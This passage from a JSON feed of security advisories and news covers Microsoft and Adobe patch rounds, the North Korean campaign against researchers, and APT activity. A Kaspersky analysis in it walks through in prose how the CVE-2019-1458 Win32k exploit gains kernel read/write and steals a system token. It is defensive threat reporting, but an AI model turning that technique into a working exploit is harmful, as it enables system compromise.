This patch should be prioritized.\n\n### splwow64 Elevation of Privilege\n\nWhile Microsoft labeled this issue ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) as an elevation-of-privilege vulnerability, it can also be exploited to disclose information, specifically uninitialized memory. Microsoft stated the vulnerability has not been exploited in the wild, although details are available publicly.\n\n### Windows Kernel Local Elevation of Privilege\n\nMicrosoft updated [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) for Windows Server 2012 in today's Patch Tuesday, and users are recommended to apply today's patches for Windows Server 2012.\n\nWe appreciate Microsoft's acknowledgement of our co-ordinated disclosure of the underlying regression in the Windows Server 2012 version of this security update.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb21-01.html>), [Illustrator](<https://helpx.adobe.com/security/products/photoshop/apsb21-02.html>), [Animate](<https://helpx.adobe.com/security/products/photoshop/apsb21-03.html>), [Campaign](<https://helpx.adobe.com/security/products/photoshop/apsb21-04.html>), [InCopy,](<https://helpx.adobe.com/security/products/photoshop/apsb21-05.html>) [Captivate](<https://helpx.adobe.com/security/products/photoshop/apsb21-06.html>) and [Bridge](<https://helpx.adobe.com/security/products/photoshop/apsb21-07.html>). 
The patches for Adobe Campaign are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "modified": "2021-01-12T20:01:43", "published": "2021-01-12T20:01:43", "id": "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "January 2021 Patch Tuesday \u2013 83 Vulnerabilities, 10 Critical, One Zero Day, Adobe", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T23:21:47", "bulletinFamily": "blog", "cvelist": ["CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1471"], "description": "This month's Patch Tuesday is rather light and addresses 36 vulnerabilities, with only 7 labeled as Critical. Five of the seven Critical vulns are in Git for Visual Studio. The others are for Hyper-V and Win32k. Also, there is one actively attacked \"Important\" vuln in Win32k. 
Adobe released patches today covering Acrobat/Reader, ColdFusion, Photoshop, and Brackets.\n\n### Workstation Patches\n\nWin32k patches ([CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>) and [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)) should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\nThough listed as Important, Microsoft has disclosed that CVE-2019-1458 is actively attacked in the wild.\n\n### Hyper-V Hypervisor Escapes\n\nA remote code execution vulnerability ([CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>)) is patched in Hyper-V that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all Hyper-V systems.\n\n### Git for Visual Studio\n\nMicrosoft patched 5 vulnerabilities ([CVE-2019-1354](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1354>), [CVE-2019-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1350>), [CVE-2019-1352](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1352>), [CVE-2019-1387](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1387>), and [CVE-2019-1349](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1349>)) in Git for Visual Studio. Exploitation requires that a user clones a malicious repo. Based on the details provided, the vulnerabilities appear to all be Command Injection. 
These patches should be prioritized for any Visual Studio installations that use Git.\n\n### Adobe\n\nAdobe's Patch Tuesday covers Acrobat/Reader, ColdFusion, Photoshop, and Brackets. The patches for [Acrobat/Reader](<https://helpx.adobe.com/security/products/acrobat/apsb19-55.html>) (21 vulns) and [ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb19-58.html>) (1 vuln) are listed as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the patches for [Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb19-56.html>) (2 vulns) and [Brackets](<https://helpx.adobe.com/security/products/brackets/apsb19-57.html>) (1 vuln) are labeled [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>). The Acrobat/Reader patches should be prioritized for Workstations with this software installed, and the ColdFusion patches should be prioritized on ColdFusion servers.", "modified": "2019-12-10T19:04:23", "published": "2019-12-10T19:04:23", "id": "QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/12/10/december-2019-patch-tuesday-36-vulns-7-critical-actively-attacked-win32k-vuln-adobe-vulns", "type": "qualysblog", "title": "December 2019 Patch Tuesday \u2013 36 Vulns, 7 Critical, Actively Attacked Win32k vuln, Adobe vulns", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2021-01-13T06:30:13", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1674", "CVE-2021-1705"], "description": "[](<https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nFor the first patch Tuesday of 2021, Microsoft released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>) addressing a total of 83 flaws spanning as many as 11 products and services, including an actively exploited 
zero-day vulnerability.\n\nThe latest security patches cover Microsoft Windows, Edge browser, ChakraCore, Office and Microsoft Office Services, and Web Apps, Visual Studio, Microsoft Malware Protection Engine, .NET Core, ASP .NET, and Azure. Of these 83 bugs, 10 are listed as Critical, and 73 are listed as Important in severity.\n\nThe most severe of the issues is a remote code execution (RCE) flaw in Microsoft Defender ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) that could allow attackers to infect targeted systems with arbitrary code.\n\nMicrosoft Malware Protection Engine (mpengine.dll) provides the scanning, detection, and cleaning capabilities for Microsoft Defender antivirus and antispyware software. The last version of the software affected by the flaw is 1.1.17600.5, before it was addressed in version 1.1.17700.4.\n\nThe bug is also known to have been actively exploited in the wild, although details are scarce on how widespread the attacks are or how this is being exploited. 
It's also a zero-click flaw in that the vulnerable system can be exploited without any interaction from the user.\n\nMicrosoft said that despite active exploitation, the technique is not functional in all situations and that the exploit is still considered to be at a proof-of-concept level, with substantial modifications required for it to work effectively.\n\nWhat's more, the flaw may already be resolved as part of automatic updates to the Malware Protection Engine \u2014 which it typically releases once a month or when required to safeguard against newly discovered threats \u2014 unless the systems are not connected to the Internet.\n\n\"For organizations that are configured for automatic updating, no actions should be required, but one of the first actions a threat actor or malware will try to attempt is to disrupt threat protection on a system so definition and engine updates are blocked,\" said Chris Goettl, senior director of product management and security at Ivanti.\n\nTuesday's patch also rectifies a privilege escalation flaw ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) introduced by a previous patch in the GDI Print / Print Spooler API (\"splwow64.exe\") that was [disclosed by Google Project Zero](<https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html>) last month after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOther vulnerabilities fixed by Microsoft include a memory corruption flaw in Microsoft Edge browser ([CVE-2021-1705](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1705>)), a Windows Remote Desktop Protocol Core Security feature bypass flaw ([CVE-2021-1674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1674>), CVSS score 8.8), and five critical RCE flaws in Remote Procedure Call Runtime.\n\nTo install the latest security updates, Windows users can head to Start > Settings > 
Update & Security > Windows Update, or by selecting Check for Windows updates.\n", "modified": "2021-01-13T05:01:20", "published": "2021-01-13T05:01:00", "id": "THN:9CF96D7230D0DBA395C1DEDA718226AD", "href": "https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html", "type": "thn", "title": "Microsoft Issues Patches for Defender Zero-Day and 82 Other Windows Flaws", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-29T10:26:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "[](<https://thehackernews.com/images/-iuZmw75wd8g/YA-j-PbeyrI/AAAAAAAABlE/RgTbZC607W00K50gmsHyQ2wxzElQjkCMwCLcBGAsYHQ/s0/north-korean-hackers.jpg>)\n\nGoogle on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.\n\nThe internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.\n\nThe goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.\n\n\"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers,\" 
[said](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) TAG researcher Adam Weidemann.\n\nThe attackers created as many as 10 fake Twitter personas and five LinkedIn profiles, which they used to engage with the researchers, share videos of exploits, retweet other attacker-controlled accounts, and share links to their purported research blog.\n\nIn one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw ([CVE-2021-1647](<https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html>)), when in reality, the exploit turned out to be fake.\n\n[](<https://thehackernews.com/images/-z357EvP7xhQ/YA-h_c5mACI/AAAAAAAABk4/Rfunq4GEsRYSpfML7a1rW1uzau-Y92QCQCLcBGAsYHQ/s0/twitter.jpg>)\n\nThe North Korean hackers are also said to have used a \"novel social engineering method\" to hit security researchers by asking them if they would like to collaborate on vulnerability research together and then provide the targeted individual with a Visual Studio Project.\n\nThis Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.\n\nKaspersky researcher Costin Raiu, in a [tweet](<https://twitter.com/craiu/status/1353964086455902208>), noted the malware delivered via the project shared code-level similarities with [Manuscrypt](<https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer>) (aka FAILCHILL or Volgmer), a previously known Windows backdoor deployed by the Lazarus Group.\n\nWhat's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 
server.\n\n[](<https://thehackernews.com/images/-5WNEGS3rJFg/YA-ht9CNs1I/AAAAAAAABkw/Q6gouDrb7eg3yZSUK7zlsoHZh-S_1heVACLcBGAsYHQ/s0/security-reseachers.jpg>)\n\nWith the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.\n\n\"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,\" Weidemann said.\n\n### UPDATE (28 Jan, 2021): Microsoft releases more information on this campaign\n\nIn a separate analysis, Microsoft corroborated the findings, attributing the attacks to a threat actor it calls ZINC, also known as Lazarus Group or Hidden Cobra.\n\nThe Windows maker said the campaign took root in mid-2020 when the adversary \"started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog.\"\n\nMicrosoft's analysis of the malicious DLL (dubbed \"Comebacker\") has also revealed the group's attempts to evade detection via static indicators of compromise (IoCs) by frequently changing file names, file paths, and exported functions. \"We were first alerted to the attack when Microsoft Defender for Endpoint detected the Comebacker DLL attempting to perform process privilege escalation,\" the company [said](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>).\n\nThat's not all. 
With some researchers infected simply by visiting the website on fully patched systems running Windows 10 and Chrome browser, the company suspects a Chrome exploit chain leveraging zero-day or patch gap exploits was hosted on the blog, leading to the compromise.\n\n\"A blog post titled _DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug_, was shared by the actor on October 14, 2020 from Twitter,\" the researchers said. \"From October 19-21, 2020, some researchers, who hadn't been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after.\"\n", "modified": "2021-01-29T09:15:54", "published": "2021-01-26T05:10:00", "id": "THN:970890B8E519A3BC5427798160F5F09C", "href": "https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html", "type": "thn", "title": "N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:23:44", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1462", "CVE-2019-1471"], "description": "[](<https://1.bp.blogspot.com/-RxpnqOyfKYk/XfCKSQ-twvI/AAAAAAAA188/wyq915hkjRc_JOvPZEXvsMltV7RjINNAACLcBGAsYHQ/s728-e100/microsoft-windows-update.jpg>)\n\nWith its latest and last Patch Tuesday for 2019, Microsoft is warning billions of its users of a new Windows zero-day vulnerability that attackers are actively exploiting in the wild in combination with a [Chrome exploit](<https://thehackernews.com/2019/11/chrome-zero-day-update.html>) to take remote control over vulnerable computers. 
\n \nMicrosoft's December security updates include patches for a total of 36 vulnerabilities, where 7 are critical, 27 important, 1 moderate, and one is low in severity\u2014brief information on which you can find later in this article. \n \nTracked as **CVE-2019-1458** and rated as Important, the newly patched zero-day Win32k privilege escalation vulnerability, reported by Kaspersky, was used in **Operation WizardOpium** attacks to gain higher privileges on targeted systems by escaping the Chrome sandbox. \n \nAlthough Google addressed the flaw in Chrome 78.0.3904.87 with the release of an emergency update last month after Kaspersky disclosed it to the tech giant, hackers are still targeting users who are using vulnerable versions of the browser. \n\n\n \nAs The Hacker News [reported last month](<https://thehackernews.com/2019/11/chrome-zero-day-update.html>), Operation WizardOpium involved a compromised Korean-language news portal where attackers secretly planted a then-zero-day Chrome exploit to hack computers of its visitors. \n \nAccording to [Kaspersky](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) researchers, the Chrome use-after-free exploit was chained together with the newly patched EoP flaw that exists in the way the Win32k component in Windows OS handles objects in memory. \n \n\n\n[](<https://1.bp.blogspot.com/-0b8M8M8fp_w/Xbxsu-MXsoI/AAAAAAAA1lM/Oe9kuPoxP6ozEr3xPwug8zkpFN0ngBIWACLcBGAsYHQ/s728-e100/hacking.png>)\n\n \nThe EoP exploit works on \"the latest versions of Windows 7 and even on a few builds of Windows 10\" and, if successfully exploited, could allow an attacker to run arbitrary code in kernel mode. \n \nWhile the researchers were not able to attribute the Operation WizardOpium attacks to any specific group of hackers, they found some similarities in the exploit code with the infamous [Lazarus hacking group](<https://thehackernews.com/2019/09/north-korea-cyber-attack.html>). 
\n \n\n\n## Microsoft Patch Tuesday: December 2019\n\n \nThe 7 critical security vulnerabilities [Microsoft patched this month](<https://msrc-blog.microsoft.com/2019/12/10/december-2019-security-updates-are-available/>) affect Git for Visual Studio, Hyper-V Hypervisor, and the Win32k Graphics component of Windows; successful exploitation of any of them leads to remote code execution. \n \nThe Windows Hyper-V vulnerability (**CVE-2019-1471**) enables a guest virtual machine to compromise the hypervisor, escaping from a guest virtual machine to the host, or escaping from one guest virtual machine to another guest virtual machine. \n \nGit for Visual Studio contains five critical remote code execution vulnerabilities\u2014all of which stem from the way Git for Visual Studio sanitizes input\u2014successful exploitation of which requires attackers to convince a targeted user to clone a malicious repo. \n\n \nAnother notable vulnerability, tracked as **CVE-2019-1462** and rated as important, resides in the PowerPoint software that can be exploited to run arbitrary code on a targeted computer by merely convincing the victim into opening a specially crafted presentation file. \n \nThis vulnerability affects Microsoft PowerPoint 2010, 2013, and 2016 as well as Microsoft Office 2016 and 2019 for Windows and Apple's macOS operating systems. 
\n \nOther vulnerabilities patched by Microsoft this month and marked as important reside in the following Microsoft products and services: \n \n\n\n * Windows Operating System\n * Windows Kernel\n * Windows Remote Desktop Protocol (RDP)\n * Microsoft Word\n * Microsoft Excel\n * Microsoft SQL Server Reporting Services\n * Microsoft Access software\n * Windows GDI component\n * Win32k\n * Windows Hyper-V\n * Windows Printer Service\n * Windows COM Server\n * Windows Media Player\n * Windows OLE\n * VBScript\n * Visual Studio Live Share\n * Microsoft Authentication Library for Android\n * Microsoft Defender\n * Skype for Business and Lync\n * Git for Visual Studio\n \nMost of these vulnerabilities allow information disclosure and elevation of privilege, and some also lead to remote code execution attacks, while others allow cross-site scripting (XSS), security feature bypass, spoofing, tampering, and denial of service attacks. \n \nWindows users and system administrators are highly advised to apply the latest security patches as soon as possible in an attempt to keep cybercriminals and hackers away from taking control of their computers. \n \nFor installing the latest Windows security updates, you can head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates on your PC, or you can install the updates manually. \n\n\nHave something to say about this article? 
Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-12-11T06:19:18", "published": "2019-12-11T06:19:00", "id": "THN:592EF1422E531E5A7AD2804EA7E024CD", "href": "https://thehackernews.com/2019/12/windows-zero-day-patch.html", "type": "thn", "title": "Latest Microsoft Update Patches New Windows 0-Day Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2019-12-12T11:22:50", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader \u2013 parsing PE headers, handling imports/exports, etc. 
After that, a code execution is redirected to the entry point of the DLL \u2013 the DllEntryPoint function. The PE code then creates a new thread, which is an entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was the 0-day exploit because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to windows switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call that's used to find a dozen offsets needed to set up fake kernel GDI objects in the memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. 
Then a bunch of calls to CreateBitmap are performed, the addresses to which are leaked using a handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and an undocumented syscall NtUserMessageCall is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771) and it's important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then using a call to SetBitmapBits it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value for an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. 
In this particular attack, a sandbox solution can analyze the URL or malicious payload in an isolated environment and detect the EPROCESS token manipulation.", "modified": "2019-12-10T20:00:39", "published": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. 
The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. 
The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. 
Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seeks directories that exist only in the Cyrillic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. 
The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. 
While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an 